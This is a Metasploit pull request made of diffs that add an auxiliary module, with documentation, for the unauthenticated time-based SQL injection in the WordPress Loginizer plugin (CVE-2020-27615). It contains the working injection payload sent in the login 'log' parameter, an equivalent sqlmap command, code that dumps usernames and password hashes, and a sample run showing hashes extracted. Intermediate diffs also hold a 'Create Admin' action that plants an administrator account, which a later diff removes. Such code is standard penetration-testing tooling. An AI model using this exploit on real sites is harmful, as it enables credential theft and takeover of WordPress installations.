### PR TITLE
wp_Loginizer unauth sqli (CVE-2020-27615)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md
@@ -10,6 +10,7 @@ All versions can be downloaded from [wordress.org](https://wordpress.org/plugins
 or [1.6.3](https://downloads.wordpress.org/plugin/loginizer.1.6.3.zip)
 
 This module slightly replicates sqlmap running as:
+
 ```
 python3 sqlmap.py -u http://local.target/wp-login.php --method='POST' --data='log=&pwd=password&wp-submit=Log+In&redirect_to=&testcookie=1' -p log --prefix="', ip = LEFT(UUID(), 8), url = ( TRUE " --suffix=") -- wpdeeply" --dbms mysql --technique=T --time-sec=1 --current-db
 ```
@@ -28,8 +29,6 @@ python3 sqlmap.py -u http://local.target/wp-login.php --method='POST' --data='lo
 ### ACTION: List Users
 
 This action lists `COUNT` users and password hashes.
-
-### ACTION: Create Admin
 
 ### COUNT
 

--- a/documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md
@@ -3,6 +3,13 @@
 Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in
 versions before 1.6.4.  The vulnerable parameter is in the `log` parameter.
 
+Exploitation requires Wordpress after [a87271af60113d46ab3866b1e525a1817bce742d](https://github.com/WordPress/WordPress/commit/a87271af60113d46ab3866b1e525a1817bce742d#diff-05003928101dd60650a6864173792d6fbaaccbd26820d99dbcfff47c5f61322e)
+
+* 5.4 or newer
+* 5.5 or newer
+
+Attempts to exploit non-vulnerable versions will likely cause loginizer's blacklist to ban the metasploit IP.
+
 Wordpress has forced updates of the plugin to all servers.  To test this exploit, the server
 must not have a connection to the internet.
 

--- a/documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md
@@ -9,6 +9,11 @@ must not have a connection to the internet.
 All versions can be downloaded from [wordress.org](https://wordpress.org/plugins/loginizer/advanced/)
 or [1.6.3](https://downloads.wordpress.org/plugin/loginizer.1.6.3.zip)
 
+This module slightly replicates sqlmap running as:
+```
+python3 sqlmap.py -u http://local.target/wp-login.php --method='POST' --data='log=&pwd=password&wp-submit=Log+In&redirect_to=&testcookie=1' -p log --prefix="', ip = LEFT(UUID(), 8), url = ( TRUE " --suffix=") -- wpdeeply" --dbms mysql --technique=T --time-sec=1 --current-db
+```
+
 ## Verification Steps
 
 1. Disconnect the server from the internet

--- a/documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md
@@ -1,0 +1,66 @@
+## Vulnerable Application
+
+Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in
+versions before 1.6.4.  The vulnerable parameter is in the `log` parameter.
+
+Wordpress has forced updates of the plugin to all servers.  To test this exploit, the server
+must not have a connection to the internet.
+
+All versions can be downloaded from [wordress.org](https://wordpress.org/plugins/loginizer/advanced/)
+or [1.6.3](https://downloads.wordpress.org/plugin/loginizer.1.6.3.zip)
+
+## Verification Steps
+
+1. Disconnect the server from the internet
+1. Install the plugin on wordpress
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/wp_loginizer_log_sqli`
+1. Do: `set action [action]`
+1. Do: `run`
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+### ACTION: Create Admin
+
+### COUNT
+
+If Action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `1`.
+
+## Scenarios
+
+### Wordpress 5.4.2 with Loginizer 1.6.3 on Ubuntu 20.04 using MariaDB 10.3.22
+
+#### List Users
+
+```
+resource (loginizer.rb)> use auxiliary/scanner/http/wp_loginizer_log_sqli
+resource (loginizer.rb)> set verbose true
+verbose => true
+resource (loginizer.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > set count 3
+count => 3
+msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > run
+
+[*] Checking /wp-content/plugins/loginizer/readme.txt
+[*] Found version 1.6.3 in the plugin
+[+] Vulnerable version detected
+[*] {SQLi} Executing (select group_concat(XMjgCKOLn) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) XMjgCKOLn from wp_users limit 3) ZtmrJNCuJ)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
@@ -9,79 +9,101 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::SQLi
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'WordPress Loginizer log SQLi Scanner',
-      'Description' => %q{
-        Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in
-        versions before 1.6.4.  The vulnerable parameter is in the log parameter.
-        Wordpress has forced updates of the plugin to all servers
-      },
-      'Author'       =>
-        [
-          'h00die', # msf module
-          'red0xff', # sqli help
-          'mslavco' # discovery
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Loginizer log SQLi Scanner',
+        'Description' => %q{
+          Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in
+          versions before 1.6.4.  The vulnerable parameter is in the log parameter.
+          Wordpress has forced updates of the plugin to all servers
+        },
+        'Author' =>
+          [
+            'h00die', # msf module
+            'red0xff', # sqli help
+            'mslavco' # discovery
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['URL', 'https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/'],
+            ['CVE', '2020-27615'],
+            ['URL', 'https://loginizer.com/blog/loginizer-1-6-4-security-fix/'],
+            ['URL', 'https://twitter.com/mslavco/status/1318877097184604161']
+          ],
+        'Actions' => [
+          ['List Users', 'Description' => 'Queries username, password hash for COUNT users'],
+          ['Create Admin', 'Description' => 'Adds a new admin user'],
         ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['URL', 'https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/'],
-          ['CVE', '2020-27615'],
-          ['URL', 'https://loginizer.com/blog/loginizer-1-6-4-security-fix/'],
-          ['URL', 'https://twitter.com/mslavco/status/1318877097184604161']
-        ],
-      'Actions' => [
-        ['List Admins', 'Description' => 'Queries username, password for all admin users'],
-        ['Create Admin', 'Description' => 'Adds a new admin user'],
-      ],
-      'DefaultAction' => 'List Admins',
-      'DisclosureDate' => '2020-10-21'))
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2020-10-21'
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 1])
+    ]
   end
 
-  def run_host(ip)
+  def run_host(_ip)
     unless wordpress_and_online?
-      vprint_error("Server not online or not detected as wordpress")
+      vprint_error('Server not online or not detected as wordpress')
       return
     end
 
-    checkcode = check_plugin_version_from_readme('loginizer','1.6.4')
+    checkcode = check_plugin_version_from_readme('loginizer', '1.6.4')
     if checkcode == Msf::Exploit::CheckCode::Safe
-      vprint_error("Loginizer version not vulnerable")
+      vprint_error('Loginizer version not vulnerable')
       return
     else
       print_good('Vulnerable version detected')
     end
 
-    cookie = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'wp-login.php')}).get_cookies
-    text = Rex::Text::rand_text_alpha(3,5)
-    password = Rex::Text::rand_text_alpha(10)
+    cookie = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'wp-login.php') }).get_cookies
+    # text = Rex::Text::rand_text_alpha(3,5)
+    password = Rex::Text.rand_text_alpha(10)
 
     @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
       if payload.include?('<')
-        payload.gsub!(/<>/,'=')
-        payload.gsub!(/(sleep\(\d+\.?\d*\)),0/) {'0,'+$1}
+        payload.gsub!(/<>/, '=')
+        payload.gsub!(/(sleep\(\d+\.?\d*\)),0/) { '0,' + Regexp.last_match(1) }
       end
       res = send_request_cgi({
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
         'cookie' => cookie,
         'vars_post' => {
-          'log'=> "', ip = LEFT(UUID(), 8), url = ( TRUE AND #{payload}) -- #{text}",
-          'pwd'=> password,
+          'log' => "',ip=LEFT(UUID(),8),url=#{payload}#",
+          # 'log'=> "', ip = LEFT(UUID(), 8), url = ( TRUE AND #{payload}) -- #{text}",
+          'pwd' => password,
           'wp-submit' => 'Login',
           'redirect_to' => '',
-          'testcookie'=> '1'
+          'testcookie' => '1'
         }
       })
       fail_with Failure::Unreachable, 'Connection failed' unless res
     end
-    if action.name == 'List Admins'
+    unless @sqli.test_vulnerable
+      fail_with("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+    end
+    if action.name == 'List Users'
       # https://www.redbridgenet.com/mysql-to-find-select-wordpress-users-with-administrator-capabilities/
-      print_good(@sqli.run_sql("SELECT u.user_login, u.user_pass FROM wp_users u, wp_usermeta m WHERE u.ID = m.user_id AND m.meta_key LIKE 'wp_capabilities' AND m.meta_value LIKE '%administrator%';"))
+      columns = ['user_login', 'user_pass']
+      results = @sqli.dump_table_fields('wp_users', columns, condition = '', num_limit = datastore['COUNT'])
+      table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+      results.each do |user|
+        table << user
+      end
+      print_good(table.to_s)
     elsif action.name == 'Create Admin'
-      print_status("Adding User")
+      # https://www.wpbeginner.com/wp-tutorials/how-to-add-an-admin-user-to-the-wordpress-database-via-mysql/
+      print_status('Adding User')
       # XXX remove 4
-      @sqli.run_sql("INSERT INTO 'wp_users' ('ID', 'user_login', 'user_pass', 'user_nicename', 'user_email', 'user_url', 'user_registered', 'user_activation_key', 'user_status', 'display_name') VALUES ('4', 'demo', MD5('demo'), 'Your Name', 'test@yourdomain.com', 'http://www.test.com/', '2011-06-07 00:00:00', '', '0', 'Your Name');")
+      username = Rex::Text.rand_text_alphanumeric(10)
+      password = Rex::Text.rand_text_alphanumeric(20)
+      email = "#{Rex::Text.rand_text_alphanumeric(5)}@#{Rex::Text.rand_text_alpha}.com"
+      print_status("Attempting to create #{username}:#{password} with email #{email}")
+      @sqli.run_sql("INSERT INTO 'wp_users' ('user_login', 'user_pass', 'user_nicename', 'user_email') VALUES (#{username}, MD5(#{password}), #{username}, #{email})")
       print_status('Adding to group')
       @sqli.run_sql("INSERT INTO 'databasename'.'wp_usermeta' ('umeta_id', 'user_id', 'meta_key', 'meta_value') VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');")
       print_status('Setting user level')

--- a/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
@@ -12,14 +12,29 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'WordPress Loginizer log SQLi Scanner',
       'Description' => %q{
+        Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in
+        versions before 1.6.4.  The vulnerable parameter is in the log parameter.
+        Wordpress has forced updates of the plugin to all servers
       },
-      'Author'       => 
+      'Author'       =>
         [
+          'h00die', # msf module
+          'red0xff', # sqli help
+          'mslavco' # discovery
         ],
       'License'     => MSF_LICENSE,
       'References'  =>
         [
+          ['URL', 'https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/'],
+          ['CVE', '2020-27615'],
+          ['URL', 'https://loginizer.com/blog/loginizer-1-6-4-security-fix/'],
+          ['URL', 'https://twitter.com/mslavco/status/1318877097184604161']
         ],
+      'Actions' => [
+        ['List Admins', 'Description' => 'Queries username, password for all admin users'],
+        ['Create Admin', 'Description' => 'Adds a new admin user'],
+      ],
+      'DefaultAction' => 'List Admins',
       'DisclosureDate' => '2020-10-21'))
   end
 
@@ -41,7 +56,11 @@ class MetasploitModule < Msf::Auxiliary
     text = Rex::Text::rand_text_alpha(3,5)
     password = Rex::Text::rand_text_alpha(10)
 
-    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: {verbose: datastore['VERBOSE'], encoder: 'base64', encode: 'base64'}) do |payload|
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
+      if payload.include?('<')
+        payload.gsub!(/<>/,'=')
+        payload.gsub!(/(sleep\(\d+\.?\d*\)),0/) {'0,'+$1}
+      end
       res = send_request_cgi({
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
@@ -56,6 +75,17 @@ class MetasploitModule < Msf::Auxiliary
       })
       fail_with Failure::Unreachable, 'Connection failed' unless res
     end
-    puts @sqli.current_database
+    if action.name == 'List Admins'
+      # https://www.redbridgenet.com/mysql-to-find-select-wordpress-users-with-administrator-capabilities/
+      print_good(@sqli.run_sql("SELECT u.user_login, u.user_pass FROM wp_users u, wp_usermeta m WHERE u.ID = m.user_id AND m.meta_key LIKE 'wp_capabilities' AND m.meta_value LIKE '%administrator%';"))
+    elsif action.name == 'Create Admin'
+      print_status("Adding User")
+      # XXX remove 4
+      @sqli.run_sql("INSERT INTO 'wp_users' ('ID', 'user_login', 'user_pass', 'user_nicename', 'user_email', 'user_url', 'user_registered', 'user_activation_key', 'user_status', 'display_name') VALUES ('4', 'demo', MD5('demo'), 'Your Name', 'test@yourdomain.com', 'http://www.test.com/', '2011-06-07 00:00:00', '', '0', 'Your Name');")
+      print_status('Adding to group')
+      @sqli.run_sql("INSERT INTO 'databasename'.'wp_usermeta' ('umeta_id', 'user_id', 'meta_key', 'meta_value') VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');")
+      print_status('Setting user level')
+      @sqli.run_sql("INSERT INTO 'databasename'.'wp_usermeta' ('umeta_id', 'user_id', 'meta_key', 'meta_value') VALUES (NULL, '4', 'wp_user_level', '10');")
+    end
   end
 end

--- a/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
@@ -34,7 +34,6 @@ class MetasploitModule < Msf::Auxiliary
           ],
         'Actions' => [
           ['List Users', 'Description' => 'Queries username, password hash for COUNT users'],
-          ['Create Admin', 'Description' => 'Adds a new admin user'],
         ],
         'DefaultAction' => 'List Users',
         'DisclosureDate' => '2020-10-21'
@@ -60,7 +59,6 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     cookie = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'wp-login.php') }).get_cookies
-    # text = Rex::Text::rand_text_alpha(3,5)
     password = Rex::Text.rand_text_alpha(10)
 
     @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
@@ -74,7 +72,6 @@ class MetasploitModule < Msf::Auxiliary
         'cookie' => cookie,
         'vars_post' => {
           'log' => "',ip=LEFT(UUID(),8),url=#{payload}#",
-          # 'log'=> "', ip = LEFT(UUID(), 8), url = ( TRUE AND #{payload}) -- #{text}",
           'pwd' => password,
           'wp-submit' => 'Login',
           'redirect_to' => '',
@@ -84,30 +81,15 @@ class MetasploitModule < Msf::Auxiliary
       fail_with Failure::Unreachable, 'Connection failed' unless res
     end
     unless @sqli.test_vulnerable
-      fail_with("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+      fail_with(Failure::Unknown, "#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
     end
-    if action.name == 'List Users'
-      # https://www.redbridgenet.com/mysql-to-find-select-wordpress-users-with-administrator-capabilities/
-      columns = ['user_login', 'user_pass']
-      results = @sqli.dump_table_fields('wp_users', columns, condition = '', num_limit = datastore['COUNT'])
-      table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
-      results.each do |user|
-        table << user
-      end
-      print_good(table.to_s)
-    elsif action.name == 'Create Admin'
-      # https://www.wpbeginner.com/wp-tutorials/how-to-add-an-admin-user-to-the-wordpress-database-via-mysql/
-      print_status('Adding User')
-      # XXX remove 4
-      username = Rex::Text.rand_text_alphanumeric(10)
-      password = Rex::Text.rand_text_alphanumeric(20)
-      email = "#{Rex::Text.rand_text_alphanumeric(5)}@#{Rex::Text.rand_text_alpha}.com"
-      print_status("Attempting to create #{username}:#{password} with email #{email}")
-      @sqli.run_sql("INSERT INTO 'wp_users' ('user_login', 'user_pass', 'user_nicename', 'user_email') VALUES (#{username}, MD5(#{password}), #{username}, #{email})")
-      print_status('Adding to group')
-      @sqli.run_sql("INSERT INTO 'databasename'.'wp_usermeta' ('umeta_id', 'user_id', 'meta_key', 'meta_value') VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');")
-      print_status('Setting user level')
-      @sqli.run_sql("INSERT INTO 'databasename'.'wp_usermeta' ('umeta_id', 'user_id', 'meta_key', 'meta_value') VALUES (NULL, '4', 'wp_user_level', '10');")
+
+    columns = ['user_login', 'user_pass']
+    results = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+    results.each do |user|
+      table << user
     end
+    print_good(table.to_s)
   end
 end

--- a/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
@@ -1,0 +1,61 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'WordPress Loginizer log SQLi Scanner',
+      'Description' => %q{
+      },
+      'Author'       => 
+        [
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+        ],
+      'DisclosureDate' => '2020-10-21'))
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error("Server not online or not detected as wordpress")
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('loginizer','1.6.4')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      vprint_error("Loginizer version not vulnerable")
+      return
+    else
+      print_good('Vulnerable version detected')
+    end
+
+    cookie = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'wp-login.php')}).get_cookies
+    text = Rex::Text::rand_text_alpha(3,5)
+    password = Rex::Text::rand_text_alpha(10)
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: {verbose: datastore['VERBOSE'], encoder: 'base64', encode: 'base64'}) do |payload|
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
+        'cookie' => cookie,
+        'vars_post' => {
+          'log'=> "', ip = LEFT(UUID(), 8), url = ( TRUE AND #{payload}) -- #{text}",
+          'pwd'=> password,
+          'wp-submit' => 'Login',
+          'redirect_to' => '',
+          'testcookie'=> '1'
+        }
+      })
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+    puts @sqli.current_database
+  end
+end


### PR DESCRIPTION
This is a WIP for the wordpress plugin loginizer <=1.6.3 unauth sqli.

Currently the `list users` action works, the `create admin` stuff is untested and most likely broken as i just pasted some code to look at later.  I'm also looking at extending the functionality out to possibly be a full exploit module instead of an aux.  However, wanted to give a good working space for @red0xff to work with.

Mad props goes out to @red0xff and their sqli libs, as well as support on getting this module working just right.